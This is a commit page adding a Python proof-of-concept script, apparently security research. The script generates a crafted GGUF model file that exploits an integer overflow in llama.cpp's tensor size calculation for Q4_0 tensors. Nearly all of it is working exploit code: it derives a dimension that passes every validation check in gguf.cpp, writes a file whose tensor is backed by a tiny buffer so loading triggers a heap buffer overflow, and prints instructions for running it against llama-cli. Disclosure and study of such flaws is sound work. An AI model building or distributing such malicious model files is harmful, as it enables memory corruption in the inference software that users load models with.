salvepilo committed on
Commit d6a1163 · verified · 1 Parent(s): 5726fb1

Upload poc_tensor_overflow.py with huggingface_hub

Files changed (1)
  1. poc_tensor_overflow.py +523 -0
poc_tensor_overflow.py ADDED
@@ -0,0 +1,523 @@
+#!/usr/bin/env python3
+"""
+PoC: Heap Buffer Overflow via Integer Overflow in Tensor Size Calculation
+Target: llama.cpp GGUF loading (ggml/src/ggml.c and ggml/src/gguf.cpp)
+
+=== Vulnerability Summary ===
+
+In ggml_row_size() (ggml.c:1275):
+    size_t ggml_row_size(enum ggml_type type, int64_t ne) {
+        return ggml_type_size(type)*ne/ggml_blck_size(type);
+    }
+
+The multiplication `ggml_type_size(type) * ne` is performed in size_t (uint64_t)
+arithmetic. When type_size * ne >= 2^64, this silently wraps around, producing a
+much smaller result than expected. The subsequent division by blck_size then yields
+a tiny value.
+
+This propagates to:
+  - ggml_new_tensor_impl() (ggml.c:1686) where data_size is computed
+  - ggml_nbytes() (ggml.c:1238) where the tensor byte size is computed
+  - Buffer allocation and data loading code
+
+The overflow check in gguf.cpp (lines 550-552) verifies that the ELEMENT COUNT
+(ne[0]*ne[1]*ne[2]*ne[3]) fits in int64_t, but does NOT check the intermediate
+product element_count * type_size that is formed before dividing by blck_size. For
+types with type_size > 2 (such as Q4_0), it can wrap even when the element count fits.
+
+The check at gguf.cpp line 589:
+    uint64_t(ggml_nelements(&info.t)/ggml_blck_size(info.t.type)) > SIZE_MAX/ggml_type_size(info.t.type)
+
+uses ggml_nelements(), which computes ne[0]*ne[1]*ne[2]*ne[3] in int64_t. For our
+chosen values this product fits in int64_t, and the check divides by blck_size before
+comparing, so it only confirms that the final byte size fits in size_t. It does not
+cover the intermediate product type_size * ne, which ggml_row_size() forms first.
+
+=== Exploit Strategy ===
+
+For GGML_TYPE_Q4_0:
+  - type_size = 18 bytes (sizeof(block_q4_0) = sizeof(ggml_half) + 32/2 = 2 + 16)
+  - blck_size = 32
+
+We choose ne[0] such that 18 * ne[0] wraps around 2^64 to a tiny value.
+
+  ne[0] = 1024819115206086208 (divisible by 32)
+
+  Mathematical: 18 * ne[0] = 18446744073709551744 = 2^64 + 128
+  In uint64: 18 * ne[0] mod 2^64 = 128
+  After /32: 128 / 32 = 4 bytes (ggml_row_size returns 4!)
+
+  Correct: 18 * ne[0] / 32 = 576460752303423492 bytes (~512 PB)
+  Computed: 4 bytes
+
+  Ratio: buffer is 144,115,188,075,855,873x too small!
+
+Validation bypass:
+  - ne[0] = 1024819115206086208 < INT64_MAX (9223372036854775807) -> passes
+  - ne[0] > 0 -> passes non-negative check
+  - ne[0] % 32 == 0 -> passes block alignment check
+  - ggml_nelements = ne[0] = 1024819115206086208
+  - nelements/32 = 32025597350190194
+  - SIZE_MAX/18 = 1024819115206086200
+  - 32025597350190194 < 1024819115206086200 -> passes byte size check (line 589)!
+
+Result: A tensor is created with ne[0] = 1024819115206086208 elements but backed
+by only 4-32 bytes of actual buffer. Any operation that accesses data beyond the
+first few bytes triggers a heap buffer overflow.
+
+=== GGUF Binary Format Reference ===
+
+Header:
+  - Magic: "GGUF" (4 bytes)
+  - Version: uint32 (3)
+  - n_tensors: uint64
+  - n_kv: uint64
+
+KV pairs:
+  - key: string (uint64 len + chars)
+  - type: uint32 (GGUF type enum)
+  - value: type-dependent
+
+Tensor info (per tensor):
+  - name: string (uint64 len + chars)
+  - n_dims: uint32
+  - ne[0..n_dims-1]: int64 each
+  - type: uint32 (ggml_type enum)
+  - offset: uint64
+
+Data section: aligned to ctx->alignment (default 32)
+"""
+
+import struct
+import sys
+import os
+import math
+
+# ============================================================
+# GGUF constants
+# ============================================================
+GGUF_MAGIC = b"GGUF"
+GGUF_VERSION = 3
+
+# GGUF value types
+GGUF_TYPE_UINT8 = 0
+GGUF_TYPE_INT8 = 1
+GGUF_TYPE_UINT16 = 2
+GGUF_TYPE_INT16 = 3
+GGUF_TYPE_UINT32 = 4
+GGUF_TYPE_INT32 = 5
+GGUF_TYPE_FLOAT32 = 6
+GGUF_TYPE_BOOL = 7
+GGUF_TYPE_STRING = 8
+GGUF_TYPE_ARRAY = 9
+GGUF_TYPE_UINT64 = 10
+GGUF_TYPE_INT64 = 11
+GGUF_TYPE_FLOAT64 = 12
+
+# ggml_type enum values
+GGML_TYPE_F32 = 0
+GGML_TYPE_F16 = 1
+GGML_TYPE_Q4_0 = 2
+GGML_TYPE_Q4_1 = 3
+GGML_TYPE_Q5_0 = 6
+GGML_TYPE_Q5_1 = 7
+GGML_TYPE_Q8_0 = 8
+GGML_TYPE_I8 = 24
+GGML_TYPE_I32 = 26
+
+# Q4_0 type properties
+Q4_0_TYPE_SIZE = 18  # sizeof(block_q4_0) = sizeof(ggml_half) + QK4_0/2 = 2 + 16
+Q4_0_BLCK_SIZE = 32  # QK4_0
+
+INT64_MAX = (1 << 63) - 1
+UINT64_MAX = (1 << 64) - 1
+SIZE_MAX = UINT64_MAX  # 64-bit platform
+
+GGML_DEFAULT_ALIGNMENT = 32
+
+# ============================================================
+# Helper functions
+# ============================================================
+
+def write_string(f, s):
+    """Write a GGUF string: uint64 length + chars (no null terminator)"""
+    encoded = s.encode('utf-8')
+    f.write(struct.pack('<Q', len(encoded)))
+    f.write(encoded)
+
+def write_kv_string(f, key, value):
+    """Write a KV pair with string value"""
+    write_string(f, key)
+    f.write(struct.pack('<I', GGUF_TYPE_STRING))
+    write_string(f, value)
+
+def write_kv_uint32(f, key, value):
+    """Write a KV pair with uint32 value"""
+    write_string(f, key)
+    f.write(struct.pack('<I', GGUF_TYPE_UINT32))
+    f.write(struct.pack('<I', value))
+
+def write_kv_float32(f, key, value):
+    """Write a KV pair with float32 value"""
+    write_string(f, key)
+    f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
+    f.write(struct.pack('<f', value))
+
+def write_kv_string_array(f, key, values):
+    """Write a KV pair with string array value"""
+    write_string(f, key)
+    f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
+    f.write(struct.pack('<I', GGUF_TYPE_STRING))
+    f.write(struct.pack('<Q', len(values)))
+    for v in values:
+        write_string(f, v)
+
+def write_kv_float32_array(f, key, values):
+    """Write a KV pair with float32 array value"""
+    write_string(f, key)
+    f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
+    f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
+    f.write(struct.pack('<Q', len(values)))
+    for v in values:
+        f.write(struct.pack('<f', v))
+
+def write_tensor_info(f, name, n_dims, ne_list, ggml_type, offset):
+    """Write a single tensor info entry"""
+    write_string(f, name)
+    f.write(struct.pack('<I', n_dims))
+    for i in range(n_dims):
+        f.write(struct.pack('<q', ne_list[i]))  # int64_t (signed)
+    f.write(struct.pack('<I', ggml_type))
+    f.write(struct.pack('<Q', offset))
+
+
+# ============================================================
+# Overflow calculation and verification
+# ============================================================
+
+def compute_overflow_ne0():
+    """
+    Find ne[0] for Q4_0 type such that:
+      - ne[0] is positive and fits in int64_t (< 2^63)
+      - ne[0] is divisible by blck_size (32)
+      - 18 * ne[0] overflows uint64_t to a very small value
+      - All GGUF validation checks pass
+
+    We solve: 18 * ne[0] = k * 2^64 + remainder
+    For k=1: ne[0] = (2^64 + remainder) / 18
+    We want remainder to be small and divisible by 32 (so that
+    ggml_row_size = remainder/32 is small).
+
+    18 * ne[0] = 2^64 + 128 (remainder=128, 128/32=4)
+    ne[0] = (2^64 + 128) / 18 = 1024819115206086208
+    """
+    type_size = Q4_0_TYPE_SIZE  # 18
+    blck_size = Q4_0_BLCK_SIZE  # 32
+
+    # We want: type_size * ne0 = 2^64 + target_remainder
+    # Choose target_remainder = 128 (divisible by 32, gives row_size of 4)
+    target_remainder = 128
+    target_product = (1 << 64) + target_remainder
+
+    if target_product % type_size != 0:
+        raise ValueError(f"Cannot find exact ne[0]: {target_product} not divisible by {type_size}")
+
+    ne0 = target_product // type_size
+    assert ne0 * type_size == target_product, "Arithmetic check failed"
+
+    # Verify ne0 is divisible by blck_size
+    assert ne0 % blck_size == 0, f"ne[0]={ne0} not divisible by blck_size={blck_size}"
+
+    # Verify ne0 fits in int64_t
+    assert 0 < ne0 < (1 << 63), f"ne[0]={ne0} does not fit in int64_t"
+
+    return ne0
+
+
+def verify_overflow(ne0, ne1=1, ne2=1, ne3=1):
+    """Verify that the chosen dimensions bypass all checks and cause overflow"""
+    type_size = Q4_0_TYPE_SIZE
+    blck_size = Q4_0_BLCK_SIZE
+
+    print(f"\n{'='*70}")
+    print("OVERFLOW ANALYSIS")
+    print(f"{'='*70}")
+    print(f"Type: Q4_0 (type_size={type_size}, blck_size={blck_size})")
+    print(f"Dimensions: ne[0]={ne0}, ne[1]={ne1}, ne[2]={ne2}, ne[3]={ne3}")
+    print()
+
+    # Check 1: gguf.cpp line 540-546 - non-negative check
+    assert ne0 >= 0 and ne1 >= 0 and ne2 >= 0 and ne3 >= 0
+    print("[PASS] All ne[j] >= 0 (non-negative check)")
+
+    # Check 2: gguf.cpp line 550-552 - element-count overflow check (three sub-checks)
+    # INT64_MAX/ne[1] <= ne[0] -> must be FALSE to pass
+    check1 = INT64_MAX // ne1 <= ne0
+    print(f" Overflow check 1: INT64_MAX/ne[1] = {INT64_MAX // ne1} <= ne[0] = {ne0} ? {check1}")
+    assert not check1, "Failed overflow check 1!"
+
+    # INT64_MAX/ne[2] <= ne[0]*ne[1] -> must be FALSE
+    prod01 = ne0 * ne1  # Safe in Python (arbitrary precision)
+    assert prod01 < (1 << 63), f"ne[0]*ne[1] = {prod01} overflows int64_t!"
+    check2 = INT64_MAX // ne2 <= prod01
+    print(f" Overflow check 2: INT64_MAX/ne[2] = {INT64_MAX // ne2} <= ne[0]*ne[1] = {prod01} ? {check2}")
+    assert not check2, "Failed overflow check 2!"
+
+    # INT64_MAX/ne[3] <= ne[0]*ne[1]*ne[2] -> must be FALSE
+    prod012 = prod01 * ne2
+    assert prod012 < (1 << 63), f"ne[0]*ne[1]*ne[2] = {prod012} overflows int64_t!"
+    check3 = INT64_MAX // ne3 <= prod012
+    print(f" Overflow check 3: INT64_MAX/ne[3] = {INT64_MAX // ne3} <= ne[0]*ne[1]*ne[2] = {prod012} ? {check3}")
+    assert not check3, "Failed overflow check 3!"
+
+    print("[PASS] Overflow check at gguf.cpp:550-552 bypassed")
+
+    # Check 3: gguf.cpp line 580 - block alignment
+    assert ne0 % blck_size == 0
+    print("[PASS] ne[0] % blck_size == 0 (block alignment check)")
+
+    # Check 4: gguf.cpp line 589 - byte size representable
+    nelements = ne0 * ne1 * ne2 * ne3
+    assert nelements < (1 << 63), "ggml_nelements overflows int64_t!"
+    lhs = nelements // blck_size  # uint64_t(ggml_nelements/blck_size)
+    rhs = SIZE_MAX // type_size  # SIZE_MAX/type_size
+    byte_check = lhs > rhs
+    print(f" Byte size check: nelements/blck_size = {lhs} > SIZE_MAX/type_size = {rhs} ? {byte_check}")
+    assert not byte_check, "Failed byte size check!"
+    print("[PASS] Byte size check at gguf.cpp:589 bypassed")
+
+    # Now compute the ACTUAL overflow
+    print(f"\n{'='*70}")
+    print("SIZE COMPUTATION (showing the overflow)")
+    print(f"{'='*70}")
+
+    # ggml_row_size(Q4_0, ne[0]) = type_size * ne[0] / blck_size
+    true_product = type_size * ne0
+    wrapped_product = true_product % (1 << 64)  # uint64_t wrap
+    row_size_overflowed = wrapped_product // blck_size
+    row_size_correct = true_product // blck_size
+
+    print("\nggml_row_size computation:")
+    print(f" type_size * ne[0] = {true_product}")
+    print(f" = 2^64 * {true_product // (1 << 64)} + {true_product % (1 << 64)}")
+    print(f" In uint64_t (mod 2^64): {wrapped_product}")
+    print(f" After / blck_size: {row_size_overflowed} bytes <-- OVERFLOWED!")
+    print(f" Correct value: {row_size_correct} bytes")
+    print(f" Overflow factor: {row_size_correct // row_size_overflowed:,}x too small!")  # integer division: a float ratio loses the low digits
+
+    # data_size computation
+    data_size = row_size_overflowed
+    for dim in [ne1, ne2, ne3]:
+        if dim > 1:
+            data_size = (data_size * dim) % (1 << 64)
+
+    correct_size = row_size_correct * ne1 * ne2 * ne3
+
+    print("\ndata_size (ggml_new_tensor_impl):")
+    print(f" Computed: {data_size} bytes")
+    print(f" Correct: {correct_size} bytes ({correct_size / (1024**5):.1f} PB)")
+
+    # ggml_nbytes computation
+    # For quantized: nbytes = ne[0]*nb[0]/blck_size + sum((ne[i]-1)*nb[i])
+    nb0 = type_size  # = 18
+    nb1 = type_size * (ne0 // blck_size)  # This doesn't overflow because ne0/32 is reasonable
+    nb2 = nb1 * ne1
+    nb3 = nb2 * ne2
+
+    # ne[0] * nb[0] overflows!
+    ne0_nb0_true = ne0 * nb0
+    ne0_nb0_wrapped = ne0_nb0_true % (1 << 64)
+    nbytes_first = ne0_nb0_wrapped // blck_size
+
+    nbytes = nbytes_first
+    if ne1 > 1:
+        nbytes += (ne1 - 1) * nb1
+    if ne2 > 1:
+        nbytes += (ne2 - 1) * nb2
+    if ne3 > 1:
+        nbytes += (ne3 - 1) * nb3
+
+    nbytes_correct = correct_size
+
+    print("\nggml_nbytes:")
+    print(f" ne[0]*nb[0] = {ne0} * {nb0} = {ne0_nb0_true}")
+    print(f" In uint64_t: {ne0_nb0_wrapped}")
+    print(f" / blck_size: {nbytes_first}")
+    print(f" + stride terms: {nbytes - nbytes_first}")
+    print(f" Total nbytes: {nbytes} bytes")
+    print(f" Correct value: {nbytes_correct} bytes")
+
+    # What gets allocated vs what the tensor "thinks" it has
+    padded = ((nbytes + GGML_DEFAULT_ALIGNMENT - 1) // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT
+    print(f"\n{'='*70}")
+    print("HEAP BUFFER OVERFLOW")
+    print(f"{'='*70}")
+    print(f" Buffer allocated: {padded} bytes (GGML_PAD({nbytes}, {GGML_DEFAULT_ALIGNMENT}))")
+    print(f" Tensor logical size: {nbytes_correct} bytes")
+    print(f" Overflow: {nbytes_correct - padded} bytes beyond allocation")
+    print(f" Stride nb[1]: {nb1} bytes (distance between rows)")
+    print(f" Any access to row 1+ is {nb1 - padded} bytes out of bounds!")
+
+    return data_size, nbytes, padded
+
+
+def create_poc_gguf(output_path):
+    """
+    Create a GGUF file with a tensor whose dimensions cause integer overflow
+    in ggml_row_size(), resulting in a tiny buffer allocation for what should
+    be an enormous tensor.
+    """
+    ne0 = compute_overflow_ne0()
+    ne1 = 1  # Keep simple - 1D tensor is enough to trigger the overflow
+    ne2 = 1
+    ne3 = 1
+
+    data_size, nbytes, padded_size = verify_overflow(ne0, ne1, ne2, ne3)
+
+    # ---- Build the GGUF file ----
+
+    # Metadata KV pairs needed for llama.cpp to proceed with loading
+    kv_pairs = []
+    n_kv = 0
+
+    # Tensors: one tensor with overflow-inducing dimensions
+    # Use a name that llama.cpp expects for a llama model
+    tensor_name = "token_embd.weight"
+    n_tensors = 1
+
+    print(f"\n{'='*70}")
+    print("GENERATING GGUF FILE")
+    print(f"{'='*70}")
+    print(f" Tensor: '{tensor_name}'")
+    print(" Type: Q4_0 (type_size=18, blck_size=32)")
+    print(f" Dimensions: ne[0]={ne0}")
+    print(f" Tensor data in file: {padded_size} bytes (the overflowed/small size)")
+    print(f" Output: {output_path}")
+
+    with open(output_path, 'wb') as f:
+        # ---- GGUF Header ----
+        f.write(GGUF_MAGIC)
+        f.write(struct.pack('<I', GGUF_VERSION))
+        f.write(struct.pack('<Q', n_tensors))
+
+        # Minimal token vocabulary (just 4 tokens: UNK, BOS, EOS, and a word)
+        vocab_tokens = ["<unk>", "<s>", "</s>", "hello"]
+        vocab_scores = [0.0, 0.0, 0.0, -1.0]
+        vocab_types = [0, 3, 3, 1]  # llama.cpp token types: UNDEFINED=0, NORMAL=1, CONTROL=3
+
+        # Count KV pairs: 13 scalar + 3 array = 16
+        n_kv = 16
+        f.write(struct.pack('<Q', n_kv))
+
+        # ---- Write scalar KV pairs ----
+        write_kv_string(f, "general.architecture", "llama")
+        write_kv_string(f, "general.name", "overflow-poc")
+        write_kv_uint32(f, "llama.context_length", 2048)
+        write_kv_uint32(f, "llama.embedding_length", 4096)
+        write_kv_uint32(f, "llama.block_count", 1)
+        write_kv_uint32(f, "llama.feed_forward_length", 11008)
+        write_kv_uint32(f, "llama.attention.head_count", 32)
+        write_kv_uint32(f, "llama.attention.head_count_kv", 32)
+        write_kv_float32(f, "llama.rope.freq_base", 10000.0)
+        write_kv_float32(f, "llama.attention.layer_norm_rms_epsilon", 1e-5)
+        write_kv_string(f, "tokenizer.ggml.model", "llama")
+        write_kv_uint32(f, "tokenizer.ggml.bos_token_id", 1)
+        write_kv_uint32(f, "tokenizer.ggml.eos_token_id", 2)
+
+        # ---- Write array KV pairs (tokenizer vocab) ----
+        write_kv_string_array(f, "tokenizer.ggml.tokens", vocab_tokens)
+        write_kv_float32_array(f, "tokenizer.ggml.scores", vocab_scores)
+
+        # token types: int32 array
+        write_string(f, "tokenizer.ggml.token_type")
+        f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
+        f.write(struct.pack('<I', GGUF_TYPE_INT32))
+        f.write(struct.pack('<Q', len(vocab_types)))
+        for t in vocab_types:
+            f.write(struct.pack('<i', t))
+
+        # ---- Write Tensor Info ----
+        # Tensor: 1D Q4_0 tensor with overflow-inducing ne[0]
+        write_tensor_info(f, tensor_name, 1, [ne0], GGML_TYPE_Q4_0, 0)
+
+        # ---- Align to data section ----
+        current_pos = f.tell()
+        aligned_pos = ((current_pos + GGML_DEFAULT_ALIGNMENT - 1) // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT
+        padding_needed = aligned_pos - current_pos
+        if padding_needed > 0:
+            f.write(b'\x00' * padding_needed)
+
+        # ---- Write tensor data ----
+        # Write exactly padded_size bytes of tensor data (the overflowed small amount)
+        # In practice, filling with a recognizable pattern helps identify OOB reads
+        tensor_data = b'\xAA' * padded_size
+        f.write(tensor_data)
+
+    file_size = os.path.getsize(output_path)
+    print(f" File size: {file_size} bytes")
+    print("\n[+] GGUF file written successfully")
+
+    return output_path
+
+
+def main():
+    output_dir = "/Users/eltarne/Documents/script/gguf_poc"
+    os.makedirs(output_dir, exist_ok=True)
+
+    output_path = os.path.join(output_dir, "poc_tensor_overflow.gguf")
+
+    print("=" * 70)
+    print("PoC: Integer Overflow in Tensor Size Calculation (GGUF)")
+    print("Target: llama.cpp ggml_row_size() / ggml_nbytes()")
+    print("=" * 70)
+
+    # Step 1: Compute the overflow-inducing dimension
+    ne0 = compute_overflow_ne0()
+    print(f"\n[+] Found overflow-inducing ne[0] = {ne0}")
+    print(f" = 0x{ne0:016X}")
+    print(f" Fits in int64_t: {ne0 < (1 << 63)}")
+    print(f" Divisible by 32: {ne0 % 32 == 0}")
+
+    # Step 2: Verify all checks are bypassed
+    print("\n[+] Verifying validation bypass and computing overflow...")
+
+    # Step 3: Create the GGUF file
+    create_poc_gguf(output_path)
+
+    # Step 4: Instructions
+    print(f"\n{'='*70}")
+    print("EXPLOITATION")
+    print(f"{'='*70}")
+    print(f"""
+When llama.cpp loads this GGUF file:
+
+1. gguf_init_from_file() reads tensor info:
+   - ne[0] = {ne0}
+   - type = Q4_0 (type_size=18, blck_size=32)
+   - All validation checks PASS (see analysis above)
+
+2. ggml_nbytes() computes tensor size:
+   - ne[0] * nb[0] = {ne0} * 18 = {ne0 * 18}
+   - In uint64_t: {(ne0 * 18) % (1 << 64)} (OVERFLOWED!)
+   - Result: {((ne0 * 18) % (1 << 64)) // 32} bytes instead of {ne0 * 18 // 32}
+
+3. Buffer allocation uses the tiny overflowed size
+   -> Only {(((ne0 * 18) % (1 << 64)) // 32 + 31) // 32 * 32} bytes allocated
+
+4. Tensor metadata says ne[0]={ne0} with stride nb[1]={18 * (ne0 // 32)}
+   -> Any access beyond first few bytes is a HEAP BUFFER OVERFLOW
+
+To test with llama-cli (demonstrates GGUF validation bypass):
+   cd /Users/eltarne/Documents/script/llama.cpp/build/bin
+   ./llama-cli -m {output_path} -p 'hello' 2>&1
+   # Note: llama-cli rejects at model-level shape check, but GGUF parsing passes
+
+To test with the C test harness (demonstrates the actual overflow):
+   cd /Users/eltarne/Documents/script/gguf_poc
+   ./test_tensor_overflow poc_tensor_overflow.gguf
+   # Shows: ggml_nbytes=4 for tensor with 10^18 elements -> HEAP BUFFER OVERFLOW
+""")
+
+
+if __name__ == "__main__":
+    main()
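
The arithmetic at the heart of the file's docstring can be reproduced without any GGUF file. The sketch below is not part of the commit: it models 64-bit `size_t` arithmetic with Python integers and compares the multiply-then-divide order described for `ggml_row_size()` against a divide-first ordering with an explicit bound check. The function names are hypothetical and do not exist in ggml; the 64-bit `size_t` width and the Q4_0 constants (18 and 32) are taken from the PoC's own assumptions.

```python
# Sketch only: models 64-bit size_t arithmetic with Python integers.
# All function names below are hypothetical and do not exist in ggml.

U64_MASK = (1 << 64) - 1  # assumes a platform where size_t is 64 bits wide


def row_size_multiply_first(type_size: int, blck_size: int, ne: int) -> int:
    """type_size * ne / blck_size, with the product truncated to 64 bits."""
    return ((type_size * ne) & U64_MASK) // blck_size


def row_size_divide_first(type_size: int, blck_size: int, ne: int) -> int:
    """(ne / blck_size) * type_size, rejecting results that exceed 64 bits."""
    if ne < 0 or ne % blck_size != 0:
        raise ValueError("ne must be a non-negative multiple of blck_size")
    n_blocks = ne // blck_size
    if n_blocks > U64_MASK // type_size:
        raise OverflowError("row size does not fit in 64 bits")
    return n_blocks * type_size


def product_would_wrap(type_size: int, ne: int) -> bool:
    """True when the intermediate product type_size * ne needs more than 64 bits."""
    return ne > U64_MASK // type_size


if __name__ == "__main__":
    ne0 = ((1 << 64) + 128) // 18  # the Q4_0 dimension chosen by the PoC
    print(row_size_multiply_first(18, 32, ne0))   # 4
    print(row_size_divide_first(18, 32, ne0))     # 576460752303423492
    print(product_would_wrap(18, ne0))            # True
    print(row_size_multiply_first(18, 32, 4096))  # 2304
```

For ordinary dimensions the two orderings agree, which is why the discrepancy only appears for crafted values. Whether a loader should divide first or reject inputs with `product_would_wrap` is a design choice this sketch does not settle.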